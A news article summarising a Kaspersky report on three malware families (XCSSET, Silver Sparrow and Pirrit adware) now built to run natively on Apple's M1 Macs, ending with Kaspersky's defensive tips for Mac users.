How malware is targeting the new Apple Macs

As the new kid on the block, the M1 chip-based Mac is already on the radar of malware writers, says Kaspersky.

Apple M1 Macs 2020

Image: Apple

Cybercriminals often like to attack any technology that's new in hopes of catching potential victims off guard. And that's proved true of the latest Macs. Unveiled in November 2020, the latest MacBook Air, 13-inch MacBook Pro and Mac mini are powered by Apple's M1 chip as a shift away from Intel-based architecture. Beyond attracting buyers, the new platform is attracting malware writers eager to expand their range of targets.

SEE: Apple Silicon M1 Mac buying guide: 2020 MacBook Air vs. MacBook Pro vs. Mac mini (TechRepublic)

In a report released Friday, security provider Kaspersky describes three malware threats to the M1 Mac—XCSSET malware, Silver Sparrow and Pirrit adware.

XCSSET malware

Discovered for the first time last year, the XCSSET malware mainly targets Mac developers by injecting a malicious payload into Xcode IDE projects on the victim's Mac. Triggered when the developer builds project files in Xcode, the payload is capable of several nasty tricks, including reading and dumping Safari cookies, injecting malicious JavaScript code into various websites, stealing user files and information from apps such as Notes and Skype, and encrypting user files.

Examining the executable modules of XCSSET, Kaspersky said it found a sample aimed at both Intel-based Macs and the new M1-based systems. This sample was first uploaded on Feb. 24, meaning that this particular campaign is likely ongoing. As such, Kaspersky said it believes that more malware writers are recompiling samples to run on the new Apple Macs natively.

Silver Sparrow

A recent malware threat, Silver Sparrow has already landed on more than 30,000 Macs. Instead of hiding in preinstall or postinstall scripts for application packages, the payload for Silver Sparrow conceals itself in the Distribution XML file for an app. The initial version targeted just the Intel x86_64 architecture. But the latest flavor also aims at the ARM64 platform on the M1 Macs, which shows that malware writers are trying to expand their coverage, according to Kaspersky.

Pirrit adware

An old and infamous adware family as described by Mac malware researcher Patrick Wardle, the Pirrit adware now is able to run natively on the M1 Mac as well as on an Intel-based Mac. But the symptoms are the same. Anyone whose system is infected will be treated to pop-ups, banners and other annoying ads on their Mac.

Targeting the M1 Mac

Macs with the M1 chip aren't any more or less vulnerable than those with Intel architecture, according to Kaspersky. The only difference between the two is their architecture, which means that malware writers typically have to recompile their malicious code to run on the new machines. Rather the appeal of the M1 Mac lies in its freshness.

"As soon as a platform becomes more popular or highly anticipated, developers try to ensure that their software is available for it," Kaspersky said in its report. "Malware developers are no exception."

However, security threats designed for the Intel-based Mac can still run on an M1 Mac. Due to the Rosetta 2 feature, Macs with the M1 chip are backward compatible in certain ways, which means they can run malicious code designed exclusively for Intel x86_64 architecture, Kaspersky said. This backward compatibility will be exploited by malware writers until Apple completes the shift to its proprietary chip.

Recommendations

To help you protect your Mac from malware, Evgeny Lopatin, malware analyst team lead at Kaspersky, offers the following tips:

  • Always check the source from where an application was downloaded. Malicious code is more likely to be hosted on a third-party website than at Apple's Mac App Store.
  • Keep your Mac updated. Apple regularly pushes security improvements for the Mac to patch any security flaws in macOS that are being abused by malware adversaries.
  • Regularly make file backups. If your Mac gets encrypted by malware, you'll still be able to restore your files from a backup.
  • Use security software to secure your devices from Trojans, ransomware, and other threats.

Also see